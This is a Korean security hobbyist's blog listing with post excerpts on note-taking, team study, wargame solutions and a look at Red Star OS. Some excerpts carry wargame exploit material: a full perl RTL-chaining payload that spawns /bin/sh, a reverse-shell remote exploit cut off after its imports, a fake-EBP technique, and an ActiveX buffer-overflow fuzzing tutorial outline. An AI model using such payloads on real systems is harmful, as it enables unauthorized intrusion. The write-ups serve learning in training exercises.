- Today
- Total
목록분류 전체보기 (300)
Phantom
몸으로, 손으로 직접 써라. 라는 말에 공감한다. 이유는우리 요즘은 손으로 적는 것 보다 타자로 쓰는 것이, 하물며 메모 하나라도 타자로 쓰는 것이 속도 면에서 빠르다. 그러나 기억 속에서는 맴돌지 않는다나도 지금 이걸 손으로 써야 할까? 라는 생각이 들지만 50:50이라고 생각하며 그냥 쓰련다. 쓰는것은 생각과 쓰는것을 같이 하게한다. 써내려가면서도 생각이 달라지면 지우게 되고 좀 더 깊은 writing을 하게 되는거다.지금 이 타자를 치는것보다 더 깊은 생각을 하게 되는것이겠지? 그래서 나는 이번에 코드게이트 2017(이하 코게)에서 주워온 노트로 메모를 하려한다.전에도 메모를 하는습관은 있었으나 늘 스마트폰에다가 했고 도움이 되긴 했다. 급할때는 폰을 쓰고 생각을 정리할때는 노트를 쓰면 어떨지 음...
와...브런치에다 싹다 적었는데 발행이 안된다....ㅂㄷㅂㄷ........... - 언제 어디서든 흔들리지 않고 내 머리로 생각하는 법 이것을 읽고서는 나는 저것의 경제학적으로 무슨 효과??인지 궁금했다. 그리고 저 발상이 나름 많이 들어본 '위기를 기회로..'라는 것과 비슷하다는 것을 느꼈다. 관점의 탈피, 그것으로부터 약간의 상업적 기술, '상술'로 보다 높은 수익을 얻어낸 것이니 성공이라 볼 수 있다. 이것을 나에게 적용해 볼 때, 과연 나에게는 '"어떠한 위기"를 기회로 만들 것인가? 그리고 그것을 "기회"로 만수 있는가' 나에게는 팀을 기회로 삼아보려 한다. 나는 팀의 스터딩 팀장을 맡고 있다.. 라고 거창하게 들릴지 모르지만 그저 아이들에게 기회를 주고 싶었다.내가 가지지 못한 어릴 적 컴퓨터..
아 망할 독감 ㅡㅡ 열이 38.9도로 너무 올라가서 일단 페이로드만 올린다 이번은 아주 간단한 remote exploit 이다 리버스쉘을 사용 했으며 코드는 이렇다 from socket import *from struct import pack p = lambda x: struct.pack("
요즘 참 인사개편 때문에 정신이 없는것 같다. 일단 이번 문제는 간단하다 strace 사용법 문제인데 6.2는 0x40015000~0x40016000 사이에 데이터를 받는다 이번에 CTF 챌린지 북에 더 자세한 사용법이 있는데 조금 더 배우고 다시 써볼 생각이다 아직 ltrace strace 를 잘 다룰 줄 모른다 아무튼 스택에 있는건 다 초기화되고 저 곳에값을 받게 되는데 저 부분은 내 기억으로 FC3?에서 stdin의 커스텀스택?맞나? 아무튼 stdin의 공간으로 알고 있다 ret를 그곳으로 입력하여 실행시키면 정상적으로 쉘이 따지게 된다.
아 진짜 정말 죄송합니다 하지만 적당한 공격을 했고 글을 내일 다듬기로 ㅎㅎㅎㅎㅎ 이번 문제는 RTL Chaining 이다 어려울것 없다 FTZ에서 이미 RTL Chaining 로 풀엇기에 자세한 설명은 내일 쓰겠다 긱 함수의 주소를 구해서 DO GYE GUL YUT MO로 체이닝 하여 마지막에 매개변수에 /bin/sh문자열을 넣어 실행한다 ./succubus $(perl -e 'print "\x90"x44, "\xec\x87\x04\x08", "\xbc\x87\x04\x08", "\x8c\x87\x04\x08", "\x5c\x87\x04\x08", "\x24\x87\x04\x08", "\x90"x4, "\xa8\xfa\xff\xbf", "/bin/sh"') /bin/sh의 위치는 buffer 시작지점으..
아 오늘 정말 바쁘다TeamH4C 캠프 준비, 인사 시즌이라 시청 업무 도중엔 앉아있을시간도없고퇴근하자마자 노는것이 아닌 개인사정.... 오늘하루 ㅎㅎㅎ 양심을 팔아버리겠어 어차피 안올렸던거니까 ㅎㅎㅎ zombie_assassin은 간단하게 FEBP인데 페이로드는 이렇다 Leave를 한번 더 실행해서 늘린 후에 문제 코드에 의해 지워지지않은 SFP부분을 변조하여 버퍼지점으로 이동 시킨 뒤에다시 ret는 esp+4지점의 주소로 이동하여 점프하고 RTL을 사용하여 쉘을 땄다. 이제 내일 아침에 수정작업 들어가야겠다.
def reverse(text):return text[::-1] # 문자 역순 출력 def is_palindrome(text):return text == reverse(text) # 회문 판별 함수 something = raw_input("Enter text: ")new_something = something.translate(None, "[]{}:;/!@#$%^&*()_+-=?.,\'\"") # 특정 문자를 특정 문자로 변환, None는 제거new_something = new_something.lower() # 특정 문자열을 소문자로 변환print '%s'%(new_something)if is_palindrome(new_something):# 회문 판별print 'Yes, it is a palindro..
.ActiveX의 Control에 있는 BOF취약점을 시연하려 한다. 이것을 따라 하려는데 참 오래 걸렸다. JavaScript 참..싫다 삽질을 참 오래한 것 같다. 하.. 아무튼 이번 글은 XP SP3환경에서 ActiveX를 이용해 Fuzzing으로 취약점을 찾아 공격을 하려한다. 이 글의 본문은 여기를 참조 필요한 목록은 다음과 같다. Windows XP SP3 Visual Studio 2010 + Service Pack(어디서 찾았는지 기억이…VS2010SP1dvd1.iso를 찾으시길..) Internet Explorer 6 (IE6가 없다면 IETester라는 Browser Test Tool 사용) Immunity Debugger(대충 입력하고 다운) & mona.py(첨부) COMRaider,..
북한에서 사용한다는 붉은별 OS 그 버전은 이미 2.0을 지나 3.0까지 지난해 말 익명의 pastebin에서 공개되었다. 해외에는 많은 사람들이 뜯어보기 시작했다고 한다. 아직 국내는 그리 많지 않은 건지 자세히는 모르겠다. 현재는 북한 일반인들만 이 OS를 사용한다는 설도 있다. 처음 봤을 땐 맥OS X인줄 알았다. 맥과 흡사한 이 OS는 Redhat 기반의 리눅스 OS이다. 북한의 윗분은 정작 맥프레를 쓰던데…그거 하나면 밥이몇공기여… 기본적인 기능은 다 있는 것 같다. 그런데 다 한글로 바뀌니…아니 북한언어로 바뀌니 몇몇은 이상하다. 심지어 터미널은 고전형 프로그람 안에 있어서 찾는데 시간이 조금 걸렸다. 레드햇 계열의 리눅스라면 rpm을 사용할 것이고, yum은 repo를 보니 rpm으로 URL..